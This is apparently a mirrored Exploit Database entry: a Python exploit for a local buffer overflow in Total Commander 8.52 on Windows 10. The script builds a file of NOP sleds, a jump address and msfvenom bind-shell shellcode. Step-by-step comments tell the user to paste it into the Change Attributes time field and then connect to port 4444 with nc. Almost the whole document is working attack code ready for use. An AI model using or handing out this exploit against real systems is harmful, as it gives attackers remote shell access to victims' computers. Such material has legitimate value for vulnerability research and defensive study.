Total Commander 8.52 (Windows 10) – Local Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： VIKRAMADITYA
  日期： 2015-09-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38243/

• #!/usr/bin/python 
  # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow 
  # AUTHOR: VIKRAMADITYA "-OPTIMUS"
  # Credits: Un_N0n
  # Date of Testing: 19th September 2015
  # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
  # Tested On : Windows 10 
  # Steps to Exploit
  # Step 1: Execute this python script
  # Step 2: This script will create a file called time.txt
  # Step 3: Copy the contents of time.txt file
  # Step 4: Now open Total Commander 8.52
  # Step 5: Go To file > Change Attributes.
  # Step 6: In time field paste the contents of time.txt
  # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc 
  file = open('time.txt' , 'wb');
  
  buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
  
  # msfvenom -p windows/shell_bind_tcp -f c-b '\x00\x0a\x0d'
  
  buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
  "\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
  "\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
  "\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
  "\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
  "\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
  "\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
  "\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
  "\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
  "\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
  "\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
  "\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
  "\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
  "\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
  "\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
  "\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
  "\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
  "\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
  "\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
  "\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
  "\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
  "\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
  "\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
  "\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
  
  buffer += "\x90" *10
  
  file.write(buffer)
  
  file.close()